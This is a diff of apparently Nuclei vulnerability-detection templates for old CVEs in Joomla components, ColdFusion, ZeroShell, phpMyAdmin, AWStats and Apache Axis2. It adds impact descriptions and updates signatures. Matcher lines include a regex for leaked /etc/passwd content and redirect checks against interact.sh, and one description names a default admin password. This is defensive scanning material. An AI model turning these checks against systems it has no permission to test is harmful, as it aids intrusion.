@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php. description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
remediation: | remediation: |
Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability. Apply the latest security patches or upgrade to a patched version of Joomla! ProDesk to mitigate the vulnerability.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100e1afab8f9b7ea6d75940642627e9093d1248edb6b7f67043b5d83c2234eab0ea02206f00bafb8c8bdd919ddfde1f0d342b74d4d12749e255eca7e04072de4c509453:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100fff4f0725abf21bcf55b6825cfd022b20b75e41e680ce18e4b08169f2923f78102210092bfa1840e5d2b94020d6226d2bbb157df2c1f344bef122db55ec8da3aba7044:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks. Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability. Apply the latest security patches or upgrade to a newer version of Parallels H-Sphere to mitigate the XSS vulnerability.
reference: reference:
@ -51,4 +53,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100b80eb05b64f804b1723e8d639c5985bc0aa09179c5f49be126abebb760da43db022100cda31ba602da0faee37f3838369448ee852a5c9a1b2c14cf70103dd503be9475:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402202610c0f8d75d86e21ed6b2d7639a5f879540ed64700ccef63d61d5c49545056802200ccac5c2868b1a18b7542ad02343694a9839c8aa827db9bfde1ab7ba81d1844c:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: geeknik author: geeknik
severity: medium severity: medium
description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php. description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.
remediation: | remediation: |
Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor. Upgrade to a patched version of nweb2fax or apply the necessary security patches provided by the vendor.
reference: reference:
@ -42,4 +44,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100854eb0a19f68fd8f0c16b795237778394d481fedef431451051251d791f7e7d202203cc01a5cbd10885ed29bef8ebf64d830be1f221982512b569ffd9a9a79fdc8b4:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100f317aa209617a0ac0f5b27dc38710858835641d5769cd8499709bad9cc17fa84022100b0cb6a925a432d6b22fd4ee7412c7fb438956de1fe797d92627665c8aee77a32:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file. Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Upgrade to the latest version to mitigate this vulnerability. Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
@ -48,4 +50,4 @@ http:
- type: status - type: status
status: status:
- 500 - 500
# digest: 4a0a0047304502201dea20a32ebb693d393be0d294a74bfb5b9eecb6827a8f58f157213a60428483022100e6ccfd9ff53c1724d243de900f9df24ec006a615484403dbdafa7537a3f0adca:922c64590222798bb761d5b6d8e72950 # digest: 490a00463044022060c1d7a1d7f167f4a7725386e3770f50fc41cf720cfb3766a490be90bbfc632902207e45517728eabf9310ab9dc5a100c296a85431a2f94ce584aefb7d6c05833a1f:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter. Open redirect vulnerability in cs.html in the Autonomy (formerly Verity) Ultraseek search engine allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via the url parameter.
impact: |
An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks.
remediation: | remediation: |
Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability. Apply the vendor-supplied patch or upgrade to a newer version of Autonomy Ultraseek that addresses the open redirect vulnerability.
reference: reference:
@ -38,4 +40,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# digest: 4a0a0047304502203ea8208e5f9c9a959ba132a829842ec16412e7e89e96459e772d992c1a0b419c022100bd66f70af78b54921981fa5210b7501871ae6c713617a56758b1f9b014f98e92:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022051577f83aae8349027a0a3bfc2ed4386c0b9e1c09644dc0ddd098802e023c7e0022100e69fe1be6eeae6d3523eaf92aa776f94d0e42396edf72f348c0378ef7cd1da9c:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: geeknik author: geeknik
severity: critical severity: critical
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action. description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary code on the affected system.
remediation: | remediation: |
Upgrade to a patched version of ZeroShell. Upgrade to a patched version of ZeroShell.
reference: reference:
@ -37,4 +39,4 @@ http:
part: body part: body
regex: regex:
- "root:.*:0:0:" - "root:.*:0:0:"
# digest: 490a0046304402203105e50de1b89b0165f438c48a50bd8a44fa30fe03592c5339c4a2949854804f02205fe7cbf331da5c49f1ac8be6ab55653b4358eb25d9be80a5c5df917c3cf205a2:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c159232e524cc33af61389e36bdf93790ac051100d465a44d101fed437d6d01902204c3f4b377b80d05a6d606971b970a5f55e7a05e99e48a7ded66295d9c1c523c2:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: medium severity: medium
description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name. description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the server.
remediation: | remediation: |
Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware. Apply the latest security patches or upgrade to a patched version of Horde/Horde Groupware.
reference: reference:
@ -41,4 +43,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100a48cabc5ed3721b402591d4860fd38d126b7e940ba2c6425733a7625ad7cabea0220690367ee6216c533f32eee62a5df670afffdd17227db036d876ae0a981872bdb:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100907faaad405c2236acd897cde184a91ef45ebbb033646c1c1e188b95abf7c2c202207c5a4151cd8bfbbf28ff42b726095b019cc0d25d4d1e2105313cc0a7cbd516a9:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: princechaddha author: princechaddha
severity: high severity: high
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.
remediation: | remediation: |
Update PhpMyAdmin to the latest version or apply the necessary patches. Update PhpMyAdmin to the latest version or apply the necessary patches.
reference: reference:
@ -47,4 +49,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a004730450221008e02fe97aa25d53673b25be320c0bb7d2c2f5de32b0479a6642d19caeac3176302204fbb68c73be955fb7ee136f5de9ba91f1183b932cd44a37339a3cb3629f682ff:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022072b55f94dd31deffee60f3cb3634845a62d55cb762cc7ff386cbb87e86628a46022100f409fca70224214acee88679b54a62d491ea8aa4097e70f6ae316fefbf08c8dc:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: medium severity: medium
description: | description: |
Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php. Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: | remediation: |
Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability. Apply the latest patch or upgrade to a newer version of Joomla! Cmimarketplace to mitigate the vulnerability.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100bf287275ed797bae0cb3d5d4acfc9b8e5bd3828436e45f96592c55c65cb1baa4022100ef79bc142d4be9f1c8cdca1b30e44293bf696b5686318e5ae13a18638f2267ad:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c631ca9827b32f40f6e831f6b142d509929a3a274aaa2539bd9a3bc70a6a277902202282dc777de13ade8043e5e0b684506c08b0f8362cece8841ae64f2d12922f4c:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter. description: Cisco Linksys WVC54GCA 1.00R22/1.00R24 is susceptible to local file inclusion in adm/file.cgi because it allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
impact: |
An attacker can exploit this vulnerability to read sensitive files on the device, potentially leading to unauthorized access or information disclosure.
remediation: | remediation: |
Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability. Apply the latest firmware update provided by Cisco to fix the local file inclusion vulnerability.
reference: reference:
@ -41,4 +43,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022072672def0c3c68dd608f3004581175afa8c339fb1dbe169c26b79537cc7a0619022100c7d94e2588ae1fc4f1093b3f7e02e4d2aa8e3d985506056636a77e58ba170c1f:922c64590222798bb761d5b6d8e72950 # digest: 4b0a004830460221009c71a1215235e49ed75ae5b6eeee4ad1e9cf5c5fbc2255aa4d4100800dbcc4ba022100814e7f6abe3bd9504fea75427a7595f0867986ff0f82ad2a6723448d3890a0ab:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: princechaddha author: princechaddha
severity: medium severity: medium
description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm. description: Adobe ColdFusion Server 8.0.1 and earlier contain multiple cross-site scripting vulnerabilities which allow remote attackers to inject arbitrary web script or HTML via (1) the startRow parameter to administrator/logviewer/searchlog.cfm, or the query string to (2) wizards/common/_logintowizard.cfm, (3) wizards/common/_authenticatewizarduser.cfm, or (4) administrator/enter.cfm.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: | remediation: |
Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor. Upgrade Adobe Coldfusion to a version higher than 8.0.1 or apply the necessary patches provided by the vendor.
reference: reference:
@ -48,4 +50,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100f880585c3b7a9bf4bace78a0d12cc7b59987555063071d3b42d5a6ec991e5fc402206d9ea98a5964a7b6b3fd001ec59a4a6a4018795896552e88707057bbf2984cf1:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100bcb065b4315286d0190f8d478c738b86bc6bbf0a9eee7e6b4c473e41e01c1802022100c1f7c414f91bd4fa0876cc2bd72f1be77b892b1d20003177d66640667e38aa3b:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion). description: Joomla! Ideal MooFAQ 1.0 via com_moofaq allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter (local file inclusion).
impact: |
The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, information disclosure.
remediation: | remediation: |
Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor. Update Joomla! MooFAQ to the latest version or apply the official patch provided by the vendor.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100ecd994a0eb2717ce10c4b5c91e5280c1fd8fac39010ab27a6e7dd81ad84421d3022061a0659d0ab3cf0e69480b1407ab7d15ea63da4942aa97535f935fe18c40d1ae:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100d8c26e00ba2ed5716865bac39ee41243548410e07a5e04e196f13ecb86b5f6f0022029bacb42734f85338a1131945160673281e9ebda83ca881f2aba07019b4c2330:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php. description: Joomla! JoomlaPraise Projectfork (com_projectfork) 2.0.10 allows remote attackers to read arbitrary files via local file inclusion in the section parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire Joomla! installation.
remediation: | remediation: |
Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability. Upgrade to a patched version of JoomlaPraise Projectfork or apply the necessary security patches to mitigate the LFI vulnerability.
reference: reference:
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100843946ac00e19969b2641e5f8b8c44b890e6dd8226f04c95aa84a62843d6219b0221009a53d57de2bfea8a7b8bb17dd7fd7b8ae9299a4080a7610269331a945dc481df:922c64590222798bb761d5b6d8e72950 # digest: 4b0a0048304602210091f181784616328a479c0a45ea51ca6e3ec45cf35125c50b1a74018f9dd535a7022100dc27152143b4d3818133866645b2e1e1f647b142875a267d0667d9e9c7c867f9:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php. description: Joomla! Agora 3.0.0b (com_agora) allows remote attackers to include and execute arbitrary local files via local file inclusion in the action parameter to the avatars page, reachable through index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
remediation: | remediation: |
Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability. Apply the latest security patches or upgrade to a patched version of Joomla! Agora to mitigate the vulnerability.
reference: reference:
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100b811a5bc6dc389222b5a3b2f6348b1bcdc4da180e2f621afdd6b06581e7db2be022100f760318fa5da56e59b4164508d2560e355438a21041091b07eb695f19467d51d:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100a1f28b173218b3d629d38aced121196c827be859dc4aca670b95c7b18307b430022049aa913dbdffabe7a2c1cf439f0b580f53add89ba434c8ad0a2a22652bd51bc4:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php. description: Joomla! Roland Breedveld Album 1.14 (com_album) is susceptible to local file inclusion because it allows remote attackers to access arbitrary directories and have unspecified other impact via a .. (dot dot) in the target parameter to index.php.
impact: |
The vulnerability allows an attacker to include arbitrary files from the local file system, potentially leading to unauthorized access, data disclosure.
remediation: | remediation: |
Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates. Update to the latest version of Joomla! Roland Breedveld Album and apply any available patches or security updates.
reference: reference:
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022025c84025809994ed122c6b1eee98bcf3d7b45244c28b2e007708b624f8fed7ca022100e65d6b60af4d2ac032f3e91762da0bb8d31027cf10958a2c6de7112ec4c2aa69:922c64590222798bb761d5b6d8e72950 # digest: 4a0a0047304502205a8d55e39ef2ea81aef6917c75f74e1c17a628dc7048d68593bbf43b03dc8d86022100ebf7f9db037558e784a25d3fbb3d33cd5aaaa5cfef70c4974e29a2bc48f623b8:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php. description: Joomla! Omilen Photo Gallery (com_omphotogallery) component Beta 0.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: | remediation: |
Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability. Upgrade to a patched version of Joomla! Omilen Photo Gallery or apply the necessary security patches to mitigate the LFI vulnerability.
reference: reference:
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100cc34793390f6a455392251d314e76db191c695bb242f901992f2fed5d30deb2a02203db9da85de2f6409024c76ec318dee40be8344b6c1484486afbb1a6986bcf231:922c64590222798bb761d5b6d8e72950 # digest: 490a004630440220039a98604f42ee7ccff3678a04d529befe9dd08295868ac0d4e6e725a91cbfd10220045ad4a883e12545de1290ad6fed5f97abefbc452ac43de71e42e1904acbebb7:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: geeknik author: geeknik
severity: high severity: high
description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter. description: KR-Web 1.1b2 and prior contain a remote file inclusion vulnerability via adm/krgourl.php, which allows remote attackers to execute arbitrary PHP code via a URL in the DOCUMENT_ROOT parameter.
impact: |
An attacker can exploit this vulnerability to include arbitrary files from remote servers, leading to remote code execution or information disclosure.
remediation: | remediation: |
Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability. Upgrade to a patched version of KR-Web or apply the necessary security patches to fix the remote file inclusion vulnerability.
reference: reference:
@ -42,4 +44,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100a31c2cc438bd399b0ff46d0737df967df4f8636a9545dacfb35f4c0fd16fbfe8022100d8ff3adcae6bbe7f02f215edf09b98d9890993edad83c73ddbfad540d5862f9e:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100f241e186edb9af52a94d640b6a9e57852c75c54669bd59af1aafb3cf6ee08258022100c680d5c1c0b6b27a520c2401d2c1aa0a9978874b840bf8f52c24ba6fc4c50121:922c64590222798bb761d5b6d8e72950

View File

@ -6,6 +6,8 @@ info:
severity: high severity: high
description: | description: |
Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. Joomla! Portfolio Nexus 1.5 contains a remote file inclusion vulnerability in the inertialFATE iF (com_if_nexus) component that allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: | remediation: |
Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability. Apply the latest security patches and updates provided by Joomla! to fix the Remote File Inclusion vulnerability.
reference: reference:
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a004730450221008b806c6b509027ab419fab38023c2270cef1e3f60dc3b633fcacb5f8983dd8cf02205a10ec21151ba918555d2ea46f2e687dc5d87cec0d39ebc0a0b57409e230999f:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100fd99275b8ffe3388f14498c542a677e467dc6409ffdede89b682d47aa5e98d8b02205e878695cd94db9f7e485d448c02aa9df416a8c7cfd6d160dc8197f103e279d7:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: pdteam author: pdteam
severity: medium severity: medium
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors. description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
impact: |
Allows attackers to redirect users to malicious websites or phishing pages.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://nvd.nist.gov/vuln/detail/CVE-2009-5020 - https://nvd.nist.gov/vuln/detail/CVE-2009-5020
@ -35,4 +37,4 @@ http:
part: header part: header
regex: regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
# digest: 4a0a00473045022014c3212369c069e74aced2e09cce019e7e3b3886dfccc0ba176b48f527d4b043022100f78dc1e0ff2cac698e269f9ef77e3fcdcd42093d0b5e83408b716fe56dc61a24:922c64590222798bb761d5b6d8e72950 # digest: 490a0046304402200bd227f253fce18d4e4dd678a4cc08f7497a6058e0f1f1b544eb1e5ba22785f7022069b1097b262d7b9c4eb7fc023566c7c5ed00eba4c26e9dbf4400cbb4b4b9cc58:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter. description: A directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
impact: |
An attacker can view, modify, or delete sensitive files on the server, potentially leading to unauthorized access or data leakage.
remediation: Apply all relevant security patches and product upgrades. remediation: Apply all relevant security patches and product upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/36994 - https://www.exploit-db.com/exploits/36994
@ -39,4 +41,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4a0a00473045022100b6c44cb3482f8af652dee916a6c29922919394156205dd5af4613be52de7636c0220267ff1847f78cf578c20c01583d01239ad9f6e99849d7ba6c676758599057209:922c64590222798bb761d5b6d8e72950 # digest: 4a0a00473045022100c11864aea146ea6435caa4fa55436335832385d19a76a69f9b1e4d0715768f20022064458c5f14208af4e71638abc8560be81a228ca423a9dfbcf3bed250a4e70ed8:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: high severity: high
description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php. description: A directory traversal vulnerability in the Bible Study (com_biblestudy) component 6.1 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter in a studieslist action to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
remediation: Upgrade to the latest version to mitigate this vulnerability. remediation: Upgrade to the latest version to mitigate this vulnerability.
reference: reference:
- https://www.exploit-db.com/exploits/10943 - https://www.exploit-db.com/exploits/10943
@ -38,4 +40,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a00483046022100ceeedcc9f9dd5600c7fc59e5441a85a74f2cf464291aaaf3aff0e3a10ff69453022100d99175c115a1b1205fa7d13ea7fc618f6db58e8b226011dfc16aa015c67b1064:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100862d6d8773869cf58419d323a548a4fe4934ffe52e1a773f8332d9c8bbb0efb60221008df16010b4804b0f237b8798cc9cdc67311efd336768a46455967917e0f4bac8:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: pikpikcu author: pikpikcu
severity: critical severity: critical
description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service. description: Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or the ability to modify or delete data.
remediation: | remediation: |
Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor. Disable or restrict access to the Axis2 web interface, or apply the necessary patches or updates provided by the vendor.
reference: reference:
@ -59,4 +61,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
# digest: 4b0a004830460221008aeb0223b59b1f43d1b5d86891682f6fdabd96f95cf747888a3ea67ea2d961a0022100ebb625cdd128e413ab38e6562e20e3b8cebdf838ac95c99355133af62512e6a0:922c64590222798bb761d5b6d8e72950 # digest: 4b0a00483046022100da41e43897f5784bf8aa6bc1dfb5721db7618454aaf6c4182246a13b30b47a86022100ca97f29ef3b646a1cdf2f366ed582fdbfcf01a0a1c1c32ba84089c386e96edf1:922c64590222798bb761d5b6d8e72950

View File

@ -5,6 +5,8 @@ info:
author: daffainfo author: daffainfo
severity: medium severity: medium
description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php. description: A directory traversal vulnerability in the ccNewsletter (com_ccnewsletter) component 1.0.5 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a ccnewsletter action to index.php.
impact: |
Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server, leading to unauthorized access and potential data leakage.
remediation: Apply all relevant security patches and upgrades. remediation: Apply all relevant security patches and upgrades.
reference: reference:
- https://www.exploit-db.com/exploits/11282 - https://www.exploit-db.com/exploits/11282
@ -40,4 +42,4 @@ http:
- type: status - type: status
status: status:
- 200 - 200
